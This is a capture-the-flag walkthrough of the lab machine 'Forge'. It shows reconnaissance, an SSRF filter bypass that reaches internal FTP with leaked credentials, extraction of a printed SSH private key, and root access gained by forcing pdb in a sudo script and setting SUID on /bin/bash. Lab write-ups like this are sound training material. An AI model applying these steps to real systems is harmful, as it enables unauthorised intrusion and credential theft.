Forge

Nmap

➜ Forge nmap -sV -sC -T3 [Link] -oN nmap/[Link]

Starting Nmap 7.92 ( [Link] ) at 2021-09-12 17:20 +0530
Nmap scan report for [Link]
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 3072 [Link] (RSA)
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to [Link]
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: [Link]; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at

[Link] .
Nmap done: 1 IP address (1 host up) scanned in 77.36 seconds
➜ Forge

vhost enum

ffuf -w /usr/share/seclists/Discovery/DNS/[Link] -u
[Link] -H "Host: [Link]" -t 200 -fl 10

➜ Forge ffuf -w /usr/share/seclists/Discovery/DNS/[Link] -u

[Link] -H "Host: [Link]" -t 200 -fl 10

/'___\ /'___\ /'___\

/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
 \/_/ \/_/ \/___/ \/_/

v1.3.1-dev
________________________________________________

:: Method : GET
:: URL : [Link]
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/shubs-
[Link]
:: Header : Host: [Link]
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response lines: 10
________________________________________________

admin [Status: 200, Size: 27, Words: 4, Lines: 2, Duration:

763ms]
:: Progress: [484699/484699] :: Job [1/1] :: 909 req/sec :: Duration:
[Link] :: Errors: 0 ::
➜ Forge

port 80 is open
there's a subdomain called admin
found a vhost called [Link] ( when we visit to the port 80 it gives redirect )
we cant access admin subdomain its localhost only

if we go to /uploads endpoint in [Link] we can see interesting option to upload files

via a link

if we try to access localhost from here we gets blacklisted domian

same for the [Link]
but we can easily bypass this by using [Link] in all caps

[Link]

so after doing so we gets a link and if we curl that and view the content in that link we
notice an interesting endpoint called announcements

<!DOCTYPE html>
<html>
<head>
<title>Admin Portal</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/[Link]">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a
href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a>
</h1>
</nav>
</header>
<br><br><br><br>
<br><br><br><br>
<center><h1>Welcome Admins!</h1></center>
</body>
</html>

so lets view the content of that endpoint

[Link]

<!DOCTYPE html>
<html>
<head>
<title>Announcements</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/[Link]">
<link rel="stylesheet" type="text/css"
 href="/static/css/[Link]">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a
href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a>
</h1>
</nav>
</header>
<br><br><br>
<ul>
<li>An internal ftp server has been setup with credentials as
user:heightofsecurity123!</li>
<li>The /upload endpoint now supports ftp, ftps, http and https
protocols for uploading from url.</li>
<li>The /upload endpoint has been configured for easy scripting of
uploads, and for uploading an image, one can simply pass a url with ?
u=&lt;url&gt;.</li>
</ul>
</body>
</html>

and we have interesting stuff

An internal ftp server has been setup with credentials as

user:heightofsecurity123!
The /upload endpoint now supports ftp, ftps, http and https protocols for
uploading from url.
The /upload endpoint has been configured for easy scripting of uploads, and for
uploading an image, one can simply pass a url with ?u=.

lets try to access ftp first by passing the ftp url in get param to the admin vhost

[Link]

and we can see the content of ftp

drwxr-xr-x 3 1000 1000 4096 Aug 04 19:23 snap

-rw-r----- 1 0 1000 33 Sep 08 08:13 [Link]

so this must be the home dir for the user so i checked the id_rsa key and it worked
 [Link]
u=[Link]

and we gets the key

-----BEGIN OPENSSH PRIVATE KEY-----

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
 shlLupso7WoS0AAAAKdXNlckBmb3JnZQE=
-----END OPENSSH PRIVATE KEY-----

for now we only have one username which us user we found this from the ftp so lets
try ssh with this username

ssh -i [Link] user@[Link]

after ssh in we can see that we can run a script as root

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User user may run the following commands on forge:

(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/[Link]
user@forge:~$

and the content of the script are

#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = [Link](1025, 65535)

try:
sock = [Link](socket.AF_INET, socket.SOCK_STREAM)
[Link](socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
[Link](('[Link]', port))
[Link](1)
print(f'Listening on localhost:{port}')
(clientsock, addr) = [Link]()
[Link](b'Enter the secret passsword: ')
if [Link](1024).strip().decode() != 'secretadminpassword':
[Link](b'Wrong password!\n')
else:
 [Link](b'Welcome admin!\n')
while True:
[Link](b'\nWhat do you wanna do: \n')
[Link](b'[1] View processes\n')
[Link](b'[2] View free memory\n')
[Link](b'[3] View listening sockets\n')
[Link](b'[4] Quit\n')
option = int([Link](1024).strip())
if option == 1:
[Link]([Link]('ps aux').encode())
elif option == 2:
[Link]([Link]('df').encode())
elif option == 3:
[Link]([Link]('ss -lnt').encode())
elif option == 4:
[Link](b'Bye\n')
break
except Exception as e:
print(e)
pdb.post_mortem(e.__traceback__)
finally:
quit()

so if you go though the script we can see there's a try catch block and interestingly if
an exception happens we can see it opens pdb

if you dont know pdb is python debugger

so how can we exploit this ? basically we need to arise an exception so if you check
the if statement they dont handle else call so if we pass something other than 1  4 it
should arise an exception so run the script as root and nc to the port from another
terminal ( ssh again and nc to that port )

user@forge:~$ sudo /usr/bin/python3 /opt/[Link]

Listening on localhost:42512

nc localhost 42512

and enter the password

secretadminpassword
now enter something invalid

user@forge:~$ nc localhost 17089

Enter the secret passsword: secretadminpassword
Welcome admin!

What do you wanna do:

[1] View processes
[2] View free memory
[3] View listening sockets
[4] Quit
hopeyoulikethewriteup

and since they dont handle this input this arise an exception and because of that it will
open pdb

except Exception as e:
print(e)
pdb.post_mortem(e.__traceback__)

so after we have pdb well we can execute any python command so import os and then
set suid to /bin/bash so that you be root easily

(Pdb) import os
(Pdb) [Link]('chmod u+s /bin/bash')

and you can see suid is set to /bin/bash

user@forge:~$ ls -la /bin/bash

-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
user@forge:~$

now get root and enjoy!

/bin/bash -p

bash-5.0# cd /root
bash-5.0# cat [Link]
eb2b840fca52fc3658cc011e4995f4af
bash-5.0#